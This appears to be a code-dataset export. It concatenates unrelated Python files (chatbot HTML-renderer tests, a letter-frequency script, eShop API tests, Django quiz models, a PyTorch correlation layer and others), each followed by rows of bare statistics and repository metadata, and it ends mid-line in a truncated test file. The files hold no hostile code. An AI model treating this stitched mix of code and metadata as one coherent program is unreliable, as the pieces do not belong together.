href="http://click.me">Hello</a></div>') def test_card_with_xml_at_end(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", '<card><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card><something>Some speech</something>') self.assertEqual(rendered, '<div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div><something>Some speech</something>') def test_card_with_xml_at_front_and_end(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", '<something>Some speech</something><card><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card><something>Some speech</something>') self.assertEqual(rendered, '<something>Some speech</something><div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div><something>Some speech</something>') def test_card_with_text_at_front(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", 'Hello<card><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card>') self.assertEqual(rendered, 'Hello<div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div>') def test_card_with_text_at_end(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", '<card><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card>Hello') self.assertEqual(rendered, '<div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div>Hello') def test_card_with_text_at_front_and_end(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", 'Hello<card><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card>Hello') self.assertEqual(rendered, 'Hello<div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div>Hello')
47.487437
295
0.682751
2,275
18,900
5.536703
0.053626
0.101302
0.048825
0.10416
0.945538
0.93625
0.931566
0.916799
0.904097
0.886631
0
0.007859
0.151693
18,900
397
296
47.607053
0.777771
0
0
0.548148
0
0.166667
0.416243
0.079365
0
0
0
0
0.307407
1
0.159259
false
0
0.011111
0
0.177778
0.007407
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
937455ce267a0a002317e3699b375f3d42927b0c
43
py
Python
tests/src/preprocess/pack/__init__.py
pystatic/pystatic
e93d372e46adf8a8f697a71b80f3c88d26272607
[ "MIT" ]
null
null
null
tests/src/preprocess/pack/__init__.py
pystatic/pystatic
e93d372e46adf8a8f697a71b80f3c88d26272607
[ "MIT" ]
null
null
null
tests/src/preprocess/pack/__init__.py
pystatic/pystatic
e93d372e46adf8a8f697a71b80f3c88d26272607
[ "MIT" ]
null
null
null
class Pack: pass pack: Pack = Pack()
7.166667
19
0.581395
6
43
4.166667
0.5
0.64
0
0
0
0
0
0
0
0
0
0
0.302326
43
5
20
8.6
0.833333
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0
0
0.333333
0
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
0
0
0
6
faf36a282c7e31a319bb3cb80b67cbc168e29c41
2,642
py
Python
6_Dictionaries/challenge_24_code.py
PacktPublishing/The-Art-of-Doing-Code-40-Challenging-Python-Programs-Today
c25f63884e5fd3a66660d48cda597b9eab4ffeac
[ "MIT" ]
11
2021-01-06T13:55:04.000Z
2022-01-06T21:57:00.000Z
6_Dictionaries/challenge_24_code.py
PacktPublishing/The-Art-of-Doing-Code-40-Challenging-Python-Programs-Today
c25f63884e5fd3a66660d48cda597b9eab4ffeac
[ "MIT" ]
null
null
null
6_Dictionaries/challenge_24_code.py
PacktPublishing/The-Art-of-Doing-Code-40-Challenging-Python-Programs-Today
c25f63884e5fd3a66660d48cda597b9eab4ffeac
[ "MIT" ]
6
2021-01-07T02:24:54.000Z
2021-12-30T15:08:51.000Z
#Dictionaries Challenge 24: Frequency Analysis App from collections import Counter print("Welcome to the Frequency Analysis App") #List of elements to remove from all text for analysis non_letters = ['1','2','3','4','5','6','7','8','9','0',' ', '.','?','!',',','"',"'",':',';','(',')','%','$','&','#','\n','\t'] #Information for the first key key_phrase_1 key_phrase_1 = input("Enter a word or phrase to count the occurrence of each letter: ").lower().strip() #Removing all non letters from key_phrase_1 for non_letter in non_letters: key_phrase_1 = key_phrase_1.replace(non_letter, '') total_occurrences = len(key_phrase_1) #Create a counter object to tally the number of each letter letter_count = Counter(key_phrase_1) #Determine the frequency analysis for the message print("\nHere is the frequency analysis from key phrase 1: ") print("\n\tLetter\t\tOccurrence\tPercentage") for key, value in sorted(letter_count.items()): percentage = 100*value/total_occurrences percentage = round(percentage, 2) print("\t" + key + "\t\t" + str(value) + "\t\t" + str(percentage) + "%") #Make a list of letters from highest occurrence to lowest ordered_letter_count = letter_count.most_common() key_phrase_1_ordered_letters = [] for pair in ordered_letter_count: key_phrase_1_ordered_letters.append(pair[0]) #Print the list print("\nLetters ordered from highest occurrence to lowest: ") for letter in key_phrase_1_ordered_letters: print(letter, end='') #Information for the second key key_phrase_2 key_phrase_2 = input("\n\nEnter a word or phrase to count the occurrence of each letter: ").lower().strip() #Removing all non letters from key_phrase_2 for non_letter in non_letters: key_phrase_2 = key_phrase_2.replace(non_letter, '') total_occurrences = len(key_phrase_2) #Create a counter object to tally the number of each letter letter_count = Counter(key_phrase_2) #Determine the frequency analysis for the message print("\nHere is the frequency analysis from key phrase 2: ") print("\n\tLetter\t\tOccurrence\tPercentage") for key, value in sorted(letter_count.items()): percentage = 100*value/total_occurrences percentage = round(percentage, 2) print("\t" + key + "\t\t" + str(value) + "\t\t" + str(percentage) + "%") #Make a list of letters from highest occurrence to lowest ordered_letter_count = letter_count.most_common() key_phrase_2_ordered_letters = [] for pair in ordered_letter_count: key_phrase_2_ordered_letters.append(pair[0]) #Print the list print("\nLetters ordered from highest occurrence to lowest: ") for letter in key_phrase_2_ordered_letters: print(letter, end='')
37.742857
126
0.736563
404
2,642
4.621287
0.212871
0.106052
0.058918
0.049277
0.863417
0.830209
0.797001
0.797001
0.714515
0.714515
0
0.019298
0.137017
2,642
69
127
38.289855
0.799561
0.236185
0
0.512821
0
0
0.249501
0.035928
0
0
0
0
0
1
0
false
0
0.025641
0
0.025641
0.282051
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
faf8e840690ce6373d96de68d881565bf751b26b
3,703
py
Python
tests/test_noa/test_game_info.py
Pooroomoo/nintendeals
993f4d159ff405ed82cd2bb023c7b75d921d0acb
[ "MIT" ]
37
2020-04-30T13:48:02.000Z
2022-03-09T04:55:54.000Z
tests/test_noa/test_game_info.py
Pooroomoo/nintendeals
993f4d159ff405ed82cd2bb023c7b75d921d0acb
[ "MIT" ]
4
2020-05-09T03:17:44.000Z
2021-04-28T00:53:55.000Z
tests/test_noa/test_game_info.py
Pooroomoo/nintendeals
993f4d159ff405ed82cd2bb023c7b75d921d0acb
[ "MIT" ]
5
2020-07-22T06:42:27.000Z
2022-02-07T22:35:57.000Z
from unittest import TestCase from nintendeals import noa from nintendeals.commons.enumerates import Features, Ratings, Regions, Platforms class TestGameInfo(TestCase): def test_game_info_non_existant(self): game = noa.game_info(nsuid="60010000000000") self.assertIsNone(game) game = noa.game_info(slug="unknown") self.assertIsNone(game) game = noa.game_info() self.assertIsNone(game) def test_game_info_3ds(self): game = noa.game_info(nsuid="50010000023235") self.assertEqual(game.platform, Platforms.NINTENDO_3DS) self.assertEqual(game.region, Regions.NA) self.assertEqual(game.title, "Super Smash Bros.") self.assertEqual(game.nsuid, "50010000023235") # self.assertEqual(game.unique_id, "AXC") TODO self.assertEqual(game.slug, "super-smash-bros-for-nintendo-3ds") self.assertEqual(game.players, 4) self.assertFalse(game.free_to_play) self.assertEqual(game.rating, (Ratings.ESRB, "Everyone 10+")) self.assertEqual(game.release_date.year, 2014) self.assertEqual(game.release_date.month, 10) self.assertEqual(game.release_date.day, 3) self.assertIn("Nintendo", game.publishers) self.assertEqual(game.features.get(Features.DEMO), True) self.assertEqual(game.eshop.ca_en, "https://www.nintendo.com/en_CA/games/detail/super-smash-bros-for-nintendo-3ds") def test_game_info_switch(self): game = noa.game_info(slug="super-smash-bros-ultimate-switch") self.assertEqual(game.platform, Platforms.NINTENDO_SWITCH) self.assertEqual(game.region, Regions.NA) self.assertEqual(game.title, "Super Smash Bros.™ Ultimate") self.assertEqual(game.nsuid, "70010000012332") # self.assertEqual(game.unique_id, "AAAB") TODO self.assertEqual(game.slug, "super-smash-bros-ultimate-switch") self.assertEqual(game.players, 8) self.assertFalse(game.free_to_play) self.assertEqual(game.rating, (Ratings.ESRB, "Everyone 10+")) self.assertEqual(game.release_date.year, 2018) self.assertEqual(game.release_date.month, 12) self.assertEqual(game.release_date.day, 7) self.assertIn("Nintendo", game.publishers) self.assertEqual(game.features.get(Features.DEMO), False) self.assertEqual(game.features.get(Features.DLC), True) self.assertEqual(game.features.get(Features.NSO_REQUIRED), True) self.assertEqual(game.features.get(Features.SAVE_DATA_CLOUD), True) self.assertEqual(game.eshop.ca_fr, "https://www.nintendo.com/fr_CA/games/detail/super-smash-bros-ultimate-switch") def test_game_info_wiiu(self): game = noa.game_info(nsuid="20010000007686") self.assertEqual(game.platform, Platforms.NINTENDO_WIIU) self.assertEqual(game.region, Regions.NA) self.assertEqual(game.title, "Super Smash Bros.") self.assertEqual(game.nsuid, "20010000007686") # self.assertEqual(game.unique_id, "AXF") TODO self.assertEqual(game.slug, "super-smash-bros-for-wii-u") self.assertEqual(game.players, 8) self.assertFalse(game.free_to_play) self.assertEqual(game.rating, (Ratings.ESRB, "Everyone 10+")) self.assertEqual(game.release_date.year, 2014) self.assertEqual(game.release_date.month, 11) self.assertEqual(game.release_date.day, 21) self.assertIn("Nintendo", game.publishers) self.assertEqual(game.features.get(Features.DEMO), False) self.assertEqual(game.eshop.us_en, "https://www.nintendo.com/en_US/games/detail/super-smash-bros-for-wii-u")
37.40404
123
0.693222
464
3,703
5.431034
0.209052
0.25
0.316667
0.092857
0.834921
0.757143
0.534524
0.473413
0.464286
0.396429
0
0.039183
0.179854
3,703
98
124
37.785714
0.789924
0.037267
0
0.370968
0
0.048387
0.156698
0.034541
0
0
0
0.010204
0.774194
1
0.064516
false
0
0.048387
0
0.129032
0
0
0
0
null
1
1
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
1
0
0
0
0
0
0
0
0
0
6
87a6470974c74cade74a45a431e262d5a22760b9
27
py
Python
flights/__init__.py
nabakirov/flight_prices
356e53ff01dc4933de39c406e4fb7e8e36a0423e
[ "MIT" ]
null
null
null
flights/__init__.py
nabakirov/flight_prices
356e53ff01dc4933de39c406e4fb7e8e36a0423e
[ "MIT" ]
null
null
null
flights/__init__.py
nabakirov/flight_prices
356e53ff01dc4933de39c406e4fb7e8e36a0423e
[ "MIT" ]
null
null
null
from . import tasks, views
13.5
26
0.740741
4
27
5
1
0
0
0
0
0
0
0
0
0
0
0
0.185185
27
1
27
27
0.909091
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
87c96b833c32f9879d5d058c331364f12d105119
35
py
Python
classifier/collaters/__init__.py
JRC1995/Continuous-RvNN
b33bdbd2f80119dc0fa3ed6d44865a3d45bc1e81
[ "MIT" ]
9
2021-06-08T13:29:26.000Z
2022-03-29T17:29:46.000Z
classifier/collaters/__init__.py
JRC1995/Continuous-RvNN
b33bdbd2f80119dc0fa3ed6d44865a3d45bc1e81
[ "MIT" ]
null
null
null
classifier/collaters/__init__.py
JRC1995/Continuous-RvNN
b33bdbd2f80119dc0fa3ed6d44865a3d45bc1e81
[ "MIT" ]
null
null
null
from .Classifier_collater import *
17.5
34
0.828571
4
35
7
1
0
0
0
0
0
0
0
0
0
0
0
0.114286
35
1
35
35
0.903226
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
87eb55ff41364df3cfc0737025c503d01a01802d
77
py
Python
proto_3/ddq/topics/logics/fol/quantifier.py
jadnohra/connect
8eb21e6f122898094447bc3d5edb3053d5a2adf2
[ "Unlicense" ]
null
null
null
proto_3/ddq/topics/logics/fol/quantifier.py
jadnohra/connect
8eb21e6f122898094447bc3d5edb3053d5a2adf2
[ "Unlicense" ]
6
2021-03-19T12:06:56.000Z
2022-03-12T00:23:09.000Z
proto_3/ddq/topics/logics/fol/quantifier.py
jadnohra/connect
8eb21e6f122898094447bc3d5edb3053d5a2adf2
[ "Unlicense" ]
null
null
null
from ddq.topics.logics.logic import Node class Quantifier(Node): pass
11
40
0.74026
11
77
5.181818
0.909091
0
0
0
0
0
0
0
0
0
0
0
0.181818
77
6
41
12.833333
0.904762
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
3553ec4c70c0fb08a7ca116c54c5219840de4732
22
py
Python
error/module.py
codelegant/python-action
6da939faa3a235d595825d442f72825b7849c393
[ "MIT" ]
null
null
null
error/module.py
codelegant/python-action
6da939faa3a235d595825d442f72825b7849c393
[ "MIT" ]
null
null
null
error/module.py
codelegant/python-action
6da939faa3a235d595825d442f72825b7849c393
[ "MIT" ]
null
null
null
import fib fib.fib(23)
11
11
0.772727
5
22
3.4
0.6
0.705882
0
0
0
0
0
0
0
0
0
0.1
0.090909
22
2
11
11
0.75
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
3561c00cf07dfa1d6c115b46e087253745853372
87
py
Python
app/main/__init__.py
josphat-otieno/blog-post
f331104ccd818147abfca0a8bb6852f3a2f0771c
[ "MIT" ]
null
null
null
app/main/__init__.py
josphat-otieno/blog-post
f331104ccd818147abfca0a8bb6852f3a2f0771c
[ "MIT" ]
null
null
null
app/main/__init__.py
josphat-otieno/blog-post
f331104ccd818147abfca0a8bb6852f3a2f0771c
[ "MIT" ]
null
null
null
from flask import Blueprint main=Blueprint('main', __name__) from .import views, forms
21.75
32
0.793103
12
87
5.416667
0.666667
0.4
0
0
0
0
0
0
0
0
0
0
0.114943
87
4
33
21.75
0.844156
0
0
0
0
0
0.045455
0
0
0
0
0
0
1
0
false
0
0.666667
0
0.666667
0.666667
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
1
0
6
3567d07266048188b0d0aef39c5805d3594bab73
104
py
Python
app/bot/__init__.py
NarayanAdithya/Portfolio2.0
691acbac1ad4220cb67c5e07a80bd401421f00d3
[ "MIT" ]
null
null
null
app/bot/__init__.py
NarayanAdithya/Portfolio2.0
691acbac1ad4220cb67c5e07a80bd401421f00d3
[ "MIT" ]
null
null
null
app/bot/__init__.py
NarayanAdithya/Portfolio2.0
691acbac1ad4220cb67c5e07a80bd401421f00d3
[ "MIT" ]
null
null
null
from flask import Blueprint bot = Blueprint('bot', __name__) from . import models, events, routes
13
38
0.721154
13
104
5.461538
0.692308
0.338028
0
0
0
0
0
0
0
0
0
0
0.192308
104
7
39
14.857143
0.845238
0
0
0
0
0
0.029412
0
0
0
0
0
0
1
0
false
0
0.666667
0
0.666667
0.666667
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
1
0
6
35a30c20a97ef18cfda0eb8e70d9c6497692b84e
7,126
py
Python
apps/quiz/models.py
diegocostacmp/e-quest
543d1bea571851a9fe2292363125a8b60105b253
[ "MIT" ]
1
2021-04-16T15:15:32.000Z
2021-04-16T15:15:32.000Z
apps/quiz/models.py
diegocostacmp/e-quest
543d1bea571851a9fe2292363125a8b60105b253
[ "MIT" ]
9
2020-02-12T02:52:08.000Z
2021-06-10T22:18:06.000Z
apps/quiz/models.py
diegocostacmp/e-quest
543d1bea571851a9fe2292363125a8b60105b253
[ "MIT" ]
null
null
null
from django.db import models import uuid from django.core.validators import MinValueValidator, MinLengthValidator from django.db import models from django.urls import reverse from django.utils.safestring import mark_safe from apps.core.models import ( User, Discipline ) # Status choices STATUS_CHOICES = ( ("A", "Ativo"), ("B", "Bloqueado"), ("D", "Desativado") ) class Quiz(models.Model): title = models.CharField(verbose_name="Título", max_length=128, help_text="Digite o nome da Discipline", null=False, blank=False, default=None) description = models.CharField(verbose_name="Descrição", max_length=512, help_text="Digite a descrição da Discipline", null=True, blank=True, default=None) uuid = models.UUIDField(verbose_name='Identificador Único', default=uuid.uuid4, editable=False) date_create = models.DateTimeField(verbose_name="Data criação", auto_now_add=True, blank=True, null=True) date_edit = models.DateTimeField(verbose_name="Data alteração", auto_now_add=True, blank=True, null=True) status = models.CharField(choices=STATUS_CHOICES, max_length=15, default="A") # fks discipline = models.ForeignKey(Discipline, verbose_name="Discipline", on_delete=models.PROTECT) user_create = models.ForeignKey(User, editable=False, related_name="+", on_delete=models.CASCADE) def __str__(self): return str(self.pk) def get_professor(self): return self.teacher.full_name def get_discipline(self): return self.discipline.title def get_status(self): if self.status == 'A': return mark_safe('<span style="width: 100%;"><span class="kt-badge kt-badge--success kt-badge--dot"></span>&nbsp;<span class="kt-font-bold kt-font-success">Ativo</span></span>') elif self.status == 'B': return mark_safe('<span style="width: 123px;"><span class="kt-badge kt-badge--danger kt-badge--dot"></span>&nbsp;<span class="kt-font-bold kt-font-danger">Bloqueado</span></span>') else: return mark_safe('<span style="width: 123px;"><span class="kt-badge kt-badge--warning kt-badge--dot"></span>&nbsp;<span class="kt-font-bold kt-font-warnings">Desativado</span></span>') class Question(models.Model): title = models.CharField(verbose_name="Título", max_length=512, help_text="Digite o nome da Discipline", null=False, blank=False, default=None) description = models.CharField(verbose_name="Descrição", max_length=1024, help_text="Digite a descrição da Discipline", null=True, blank=True, default=None) uuid = models.UUIDField(verbose_name='Identificador Único', default=uuid.uuid4, editable=False) date_create = models.DateTimeField(verbose_name="Data criação", auto_now_add=True, blank=True, null=True) date_edit = models.DateTimeField(verbose_name="Data alteração", auto_now_add=True, blank=True, null=True) status = models.CharField(choices=STATUS_CHOICES, max_length=15, default="A") # fks quiz = models.ForeignKey(Quiz, verbose_name="Quiz", on_delete=models.PROTECT) user_create = models.ForeignKey(User, editable=False, related_name="+", on_delete=models.CASCADE) last_id = models.CharField(verbose_name="Proximo", max_length=10, blank=True, null=True, default=None) time_solution = models.CharField(max_length=16, verbose_name="Tempo de solução", help_text = ("Tempo para resolver a questão"), blank=False, null=False, default=None) def __str__(self): return str(self.pk) def get_status(self): if self.status == 'A': return mark_safe('<span style="width: 100%;"><span class="kt-badge kt-badge--success kt-badge--dot"></span>&nbsp;<span class="kt-font-bold kt-font-success">Ativo</span></span>') elif self.status == 'B': return mark_safe('<span style="width: 123px;"><span class="kt-badge kt-badge--danger kt-badge--dot"></span>&nbsp;<span class="kt-font-bold kt-font-danger">Bloqueado</span></span>') else: return mark_safe('<span style="width: 123px;"><span class="kt-badge kt-badge--warning kt-badge--dot"></span>&nbsp;<span class="kt-font-bold kt-font-warnings">Desativado</span></span>') class Answer(models.Model): uuid = models.UUIDField(verbose_name='Identificador Único', default=uuid.uuid4, editable=False) date_create = models.DateTimeField(verbose_name="Data criação", auto_now_add=True, blank=True, null=True) date_edit = models.DateTimeField(verbose_name="Data alteração", auto_now_add=True, blank=True, null=True) status = models.CharField(choices=STATUS_CHOICES, max_length=15, default="A") user_create = models.ForeignKey(User, editable=False, related_name="+", on_delete=models.CASCADE, default=None) # Anwers alternative_A = models.CharField(max_length=512, verbose_name="Alternativa A", blank=False, null=False, default=None) alternative_B = models.CharField(max_length=512, verbose_name="Alternativa B", blank=False, null=False, default=None) alternative_C = models.CharField(max_length=512, verbose_name="Alternativa C", blank=False, null=False, default=None) alternative_D = models.CharField(max_length=512, verbose_name="Alternativa D", blank=False, null=False, default=None) alternative_true = models.CharField(max_length=16, verbose_name="Alternativa correta", blank=False, null=False) question = models.OneToOneField(Question, editable=False, related_name="question_related", on_delete=models.CASCADE) # Recompensas class reward(models.Model): uuid = models.UUIDField(verbose_name='Identificador Único', default=uuid.uuid4, editable=False) date_create = models.DateTimeField(verbose_name="Data criação", auto_now_add=True, blank=True, null=True) description = models.CharField(verbose_name="Descrição", max_length=1024, help_text="Digite a descrição da Discipline", null=True, blank=True, default=None) points = models.CharField(verbose_name="Pontos", max_length=5, help_text="Pontos ganhos", null=True, blank=True, default='0') # fks user = models.ForeignKey(User, editable=False, related_name="+", on_delete=models.CASCADE) discipline = models.ForeignKey(Discipline, editable=False, related_name="+", on_delete=models.CASCADE) def __str__(self): return str(self.pk) def get_nome_disciplina(self): return self.discipline.title # Recompensas alunos class reward_user(models.Model): uuid = models.UUIDField(verbose_name='Identificador Único', default=uuid.uuid4, editable=False) date_create = models.DateTimeField(verbose_name="Data criação", auto_now_add=True, blank=True, null=True) # fks user = models.ForeignKey(User, editable=False, related_name="+", on_delete=models.CASCADE) reward = models.ForeignKey(reward, editable=False, related_name="+", on_delete=models.CASCADE) def __str__(self): return str(self.pk) def get_nome_disciplina(self): return self.reward.title
57.934959
197
0.708953
945
7,126
5.196825
0.141799
0.062716
0.031765
0.031155
0.813684
0.790063
0.782733
0.73427
0.69436
0.689269
0
0.010978
0.156329
7,126
123
198
57.934959
0.805888
0.009543
0
0.568182
0
0.068182
0.22156
0.061277
0
0
0
0
0
1
0.113636
false
0
0.079545
0.090909
0.852273
0
0
0
0
null
0
0
0
1
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
6
ea0808f5e42c63412102de70e8542d9b396c2869
3,299
py
Python
Correlation/CorrelationCUDA/Corr2D.py
weurus/pointcloudexperiment-Tutorial
d457c6d17203df4b752fe0c6f1ad3ae5baa82693
[ "BSD-3-Clause" ]
12
2020-08-27T19:50:53.000Z
2022-01-25T23:13:47.000Z
Correlation/CorrelationCUDA/Corr2D.py
weurus/pointcloudexperiment-Tutorial
d457c6d17203df4b752fe0c6f1ad3ae5baa82693
[ "BSD-3-Clause" ]
1
2022-02-24T06:54:32.000Z
2022-02-24T07:52:43.000Z
Correlation/CorrelationCUDA/Corr2D.py
weurus/pointcloudexperiment-Tutorial
d457c6d17203df4b752fe0c6f1ad3ae5baa82693
[ "BSD-3-Clause" ]
2
2020-12-31T02:35:58.000Z
2021-08-14T23:05:19.000Z
import torch import Corr2D_ext def int_2_tensor(intList): return torch.tensor(intList, dtype=torch.int, requires_grad=False) def tensor_2_int(t): assert len(t.size()) == 1 assert t.size()[0] == 5 assert t.dtype == torch.int return t.tolist() class Corr2DF(torch.autograd.Function): @staticmethod def forward(ctx, x0, x1, maxDisplacement, \ padding=1, kernelSize=3, strideK=1, strideD=1): ctx.maxDisplacement = maxDisplacement ctx.padding = padding ctx.kernelSize = kernelSize ctx.strideK = strideK ctx.strideD = strideD out = Corr2D_ext.forward(x0, x1, padding, kernelSize, maxDisplacement, strideK, strideD) ctx.save_for_backward(x0, x1) return out[0] @staticmethod def backward(ctx, grad): x0, x1 = ctx.saved_tensors output = Corr2D_ext.backward( grad, x0, x1, ctx.padding, ctx.kernelSize, ctx.maxDisplacement, ctx.strideK, ctx.strideD ) return output[0], output[1], None, None, None, None, None class Corr2DM(torch.nn.Module): def __init__(self, maxDisplacement, padding=1, kernelSize=3, strideK=1, strideD=1): super(Corr2DM, self).__init__() assert maxDisplacement > 0 assert kernelSize > 0 assert kernelSize % 2 == 1 assert strideK > 0 assert strideD > 0 self.maxDisplacement = maxDisplacement self.padding = padding self.kernelSize = kernelSize self.strideK = strideK self.strideD = strideD def forward(self, x0, x1): return Corr2DF.apply( x0, x1, self.maxDisplacement, \ self.padding, self.kernelSize, self.strideK, self.strideD ) class Corr2DZNF(torch.autograd.Function): @staticmethod def forward(ctx, x0, x1, maxDisplacement, \ padding=1, kernelSize=3, strideK=1, strideD=1): ctx.maxDisplacement = maxDisplacement ctx.padding = padding ctx.kernelSize = kernelSize ctx.strideK = strideK ctx.strideD = strideD out = Corr2D_ext.forward_zn(x0, x1, padding, kernelSize, maxDisplacement, strideK, strideD) ctx.save_for_backward(x0, x1, out[0], out[1], out[2]) return out[0] @staticmethod def backward(ctx, grad): x0, x1, C, L0, L1 = ctx.saved_tensors output = Corr2D_ext.backward_zn( grad, x0, x1, C, L0, L1, ctx.padding, ctx.kernelSize, ctx.maxDisplacement, ctx.strideK, ctx.strideD ) return output[0], output[1], None, None, None, None, None class Corr2DZNM(torch.nn.Module): def __init__(self, maxDisplacement, padding=1, kernelSize=3, strideK=1, strideD=1): super(Corr2DZNM, self).__init__() assert maxDisplacement > 0 assert kernelSize > 0 assert kernelSize % 2 == 1 assert strideK > 0 assert strideD > 0 self.maxDisplacement = maxDisplacement self.padding = padding self.kernelSize = kernelSize self.strideK = strideK self.strideD = strideD def forward(self, x0, x1): return Corr2DZNF.apply( x0, x1, self.maxDisplacement, \ self.padding, self.kernelSize, self.strideK, self.strideD )
31.122642
99
0.625341
385
3,299
5.27013
0.150649
0.0276
0.035485
0.065057
0.865451
0.865451
0.865451
0.819123
0.819123
0.819123
0
0.036326
0.274022
3,299
105
100
31.419048
0.810856
0
0
0.675325
0
0
0
0
0
0
0
0
0.168831
1
0.12987
false
0
0.025974
0.038961
0.311688
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
ea6d2f5892cdb9f51ac9fd90f761b895d5ab55e3
336
py
Python
getnet/services/token/card_token.py
rafagonc/getnet-py
d2a5278b497408b5245d5d0fecd2e424f4ddb0d5
[ "MIT" ]
null
null
null
getnet/services/token/card_token.py
rafagonc/getnet-py
d2a5278b497408b5245d5d0fecd2e424f4ddb0d5
[ "MIT" ]
null
null
null
getnet/services/token/card_token.py
rafagonc/getnet-py
d2a5278b497408b5245d5d0fecd2e424f4ddb0d5
[ "MIT" ]
null
null
null
class CardToken: number_token: str def __init__(self, number_token: str): self.number_token = number_token def __str__(self): return str(self.number_token) def __eq__(self, other): match = other.number_token if isinstance(other, CardToken) else other return self.number_token == match
25.846154
77
0.678571
43
336
4.860465
0.348837
0.368421
0.287081
0.172249
0
0
0
0
0
0
0
0
0.241071
336
12
78
28
0.819608
0
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0
0.111111
0.777778
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
ea6f027ef4532aa6d3ff800e1c7581991fa3caa2
45,758
py
Python
e2e/cli/buckets/cp/test_cp_with_folders.py
msleprosy/cloud-pipeline
bccc2b196fad982380efc37a1c3785098bec6c85
[ "Apache-2.0" ]
null
null
null
e2e/cli/buckets/cp/test_cp_with_folders.py
msleprosy/cloud-pipeline
bccc2b196fad982380efc37a1c3785098bec6c85
[ "Apache-2.0" ]
12
2019-08-13T08:36:33.000Z
2019-10-01T12:04:31.000Z
e2e/cli/buckets/cp/test_cp_with_folders.py
msleprosy/cloud-pipeline
bccc2b196fad982380efc37a1c3785098bec6c85
[ "Apache-2.0" ]
2
2019-08-09T18:04:54.000Z
2019-08-11T19:03:06.000Z
# Copyright 2017-2019 EPAM Systems, Inc. (https://www.epam.com/) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from ..utils.assertions_utils import * from ..utils.file_utils import * from ..utils.utilities_for_test import * class TestCopyWithFolders(object): bucket_name = "epmcmbibpc-it-cp-folders{}".format(get_test_prefix()) other_bucket_name = "{}-other".format(bucket_name) current_directory = os.getcwd() home_dir = "test_cp_home_dir-597%s/" % get_test_prefix() checkout_dir = "checkout/" output_folder = "cp-folders-" + TestFiles.TEST_FOLDER_FOR_OUTPUT test_file_1 = "cp-folders-" + TestFiles.TEST_FILE1 test_file_with_other_extension = "cp-folders-" + 